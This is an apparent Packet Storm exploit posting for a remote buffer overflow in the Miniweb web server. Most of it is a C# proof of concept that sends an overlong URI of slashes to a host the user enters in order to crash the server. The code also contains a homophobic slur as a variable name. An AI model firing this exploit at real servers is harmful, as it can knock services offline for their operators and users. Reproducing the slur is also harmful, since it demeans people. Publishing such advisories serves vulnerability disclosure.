Miniweb Buffer Overflow

2009-04-16T00:00:00
ID PACKETSTORM:76741
Type packetstorm
Reporter e.wiZz!
Modified 2009-04-16T00:00:00

Description

                                        
                                            `################### Miniweb Remote Buffer Overflow ############################  
  
########By: e.wiZz!  
  
########Site: www.balcansecurity.com  
  
######## Found with ServMeNot (world's sexiest fuzzer :P )  
  
  
  
In the wild...  
#################################################################  
  
/* BoF when requesting URI longer than 120~ */  
  
using System;  
using System.IO;  
using System.Net;  
using System.Text;  
  
namespace idiot  
{  
class pf  
{  
static void Main(string[] args)  
{  
Console.Write("Enter host:\n");  
string site = Console.ReadLine();  
string uri = null;  
try  
{  
for (int i = 0; i < 144; i++) { uri += "/"; }  
HttpWebRequest request = (HttpWebRequest)  
HttpWebRequest.Create(site + uri);  
HttpWebResponse response = (HttpWebResponse)  
  
request.GetResponse();  
  
//any response we get means that exploit failed  
if (response.GetResponseHeader("Content-Lenght") != "a")  
{  
Console.WriteLine("Exploit failed");  
}  
  
}  
catch (Exception gayexception)  
{  
Console.WriteLine("Cannot connect");  
Console.WriteLine("{0}", gayexception.Message);  
}  
}  
}  
}  
  
`